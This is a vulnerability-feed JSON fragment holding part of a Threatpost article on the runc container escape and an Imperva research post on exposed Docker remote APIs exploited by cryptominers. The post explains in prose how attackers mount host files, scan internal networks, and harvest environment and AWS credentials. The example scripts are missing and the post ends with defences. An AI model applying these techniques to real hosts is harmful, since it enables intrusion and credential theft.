the rogue containers were used by Docker Hub users, but Kromtech estimates that the 17 images were downloaded collectively 5 million times during the year they were available.\n\nAnd Docker [last year patched](<https://threatpost.com/docker-patches-container-escape-vulnerability/123161/>) a privilege escalation vulnerability that could also have lead to container escapes, allowing a hacker to affect operations of a host from inside a container.\n\nEnterprises also report an accelerating number of container attacks. In fact, 60 percent of respondents in [a recent survey](<https://threatpost.com/threatlist-container-security/140614/>) admitted that their organizations had been hit with at least one container security incident within the past year. In companies with more than 100 containers in place, that percentage rises to 75 percent.\n", "modified": "2019-02-12T18:28:41", "published": "2019-02-12T18:28:41", "id": "THREATPOST:B4C48A638705549FED64000361BA8526", "href": "https://threatpost.com/container-security-flaw-runc/141737/", "type": "threatpost", "title": "Major Container Security Flaw Threatens Cascading Attacks", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2019-03-18T21:01:17", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nDocker is a technology that allows you to perform operating system level virtualization. An [incredible number of companies and production hosts](<https://www.zdnet.com/article/what-is-docker-and-why-is-it-so-darn-popular/>) are running Docker to develop, deploy and run applications inside containers. \n\nYou can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk \u2014 if the control gets into the wrong hands, your entire network can be in danger. \n\nIn February, a new vulnerability ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) was discovered that allows you to gain host root access from a docker container. The combination of this new vulnerability and exposed remote Docker API can lead to a fully compromised host.\n\nAccording to Imperva research, exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known-albeit-rising cryptocurrency for their financial benefit. \n\nIn this post you will learn about:\n\n * Publicly exposed Docker hosts we found\n * The risk they can put organizations in\n * Protection methods\n\n# Publicly Accessible Docker Hosts\n\nThe Docker remote API listens on ports 2735 / 2736. By default, the remote API is only accessible from the loopback interface (\u201clocalhost\u201d, \u201c127.0.0.1\u201d), and should not be available from external sources. However, as with other cases \u2014 for example, publically-accessible Redis servers such as [RedisWannaMine](<https://www.imperva.com/blog/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/>) \u2014 sometimes organizations are misconfiguring their services, allowing easy access to their sensitive data.\n\nWe used the [Shodan](<https://www.shodan.io/>) search engine to find open ports running Docker.\n\nWe found 3,822 Docker hosts with the remote API **exposed publicly**.\n\nWe wanted to see how many of these IPs are really exposed. In our research, we tried to connect to the IPs on port 2735 and list the Docker images. Out of 3,822 IPs, we found approximately **400 IPs are accessible**.\n\n##### Red indicates Docker images of crypto miners, while green shows production environments and legitimate services \n\nWe found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction. \n\nOther hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.\n\n# Hacking with the Docker Remote API \n\nThe possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:\n\n * Launch more attacks with masked IPs\n * Create a botnet\n * Host services for phishing campaigns\n * Steal credentials and data\n * Pivot attacks to the internal network\n\nHere are some script examples for the above attacks.\n\n## 1\\. Access files on the Docker host and mounted volumes\n\nBy starting a new container and mounting it to a folder in the host, we got access to other files in the Docker host:\n\n \nIt is also possible to access data outside of the host by looking on **container mounts. **Using the **Docker inspect **command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also **change the data**.\n\n## 2\\. Scan the internal network\n\nWhen a container is created in one of the predefined Docker network \u201cbridge\u201d or \u201chost,\u201d attackers can use it to access **hosts the Docker host can access** within the internal network. We used [nmap](<https://nmap.org/>) to scan the host network to find services. We did not need to install it, we simply used a ready image from the Docker Hub:\n\nIt is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our [Redis WannaMine post](<https://www.imperva.com/blog/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/>).\n\n## 3\\. Credentials leakage\n\nIt is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories. \n\nWe found 3 simple ways to detect credentials using the Docker remote API:\n\n### Docker inspect command\n\n### \u201cenv\u201d command on a container\n\nDocker inspect doesn\u2019t return all environment variables. For example, it doesn\u2019t return ones which were passed to docker run using the **-env-file** argument. Running \u201cenv\u201d command on a container will return the entire list:\n\n### Credentials files on the host\n\nAnother option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like \u201c~/.aws/credentials\u201d.\n\n## 4\\. Data Leakage\n\nHere is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:\n\n# Wrapping Up\n\nIn this post, we saw how dangerous exposing the Docker API publicly can be. \n\nExposing Docker ports can be useful, and may be required by third-party apps like \u2018[portainer](<https://www.portainer.io/>)\u2019, a management UI for Docker. \n\nHowever, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on [Securing Docker remote daemon](<https://docs.docker.com/engine/security/https/>).\n\nImperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:\n\n * What do I have?\n * Is it secure?\n\nThe tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please [contact Imperva sales](<https://www.imperva.com/contact-us/>).\n\nWe also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from being secure. Instead of using environment variables, it is possible to read the credentials on runtime (depends on your environment). In AWS you can use roles and [KMS](<https://aws.amazon.com/kms/>). In other environments, you can use 3rd party tools like [Vault](<https://www.vaultproject.io/>) or [credstash](<https://github.com/fugue/credstash>).\n\n***\n\nImperva is hosting a [live webinar with Forrester Research on Wednesday March 27 1 PM PT](<https://www.imperva.com/resources/resource-library/webinars/five-best-practices-for-application-defense-in-depth/>) on the topic, \"Five Best Practices for Application Defense in Depth.\" Join Terry Ray, Imperva SVP and Imperva Fellow, Kunal Anand, Imperva CTO, and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy bolstered by real-time visibility to help security analysts distinguish real threats from noise can provide true protection for enterprises using open-source applications in the cloud (such as the Docker hosts above). [Sign up to watch and ask questions live](<https://www.imperva.com/resources/resource-library/webinars/five-best-practices-for-application-defense-in-depth/>) or see the recording!\n\nThe post [Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners](<https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-03-04T21:00:39", "published": "2019-03-04T21:00:39", "id": "IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB", "href": "https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/", "type": "impervablog", "title": "Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}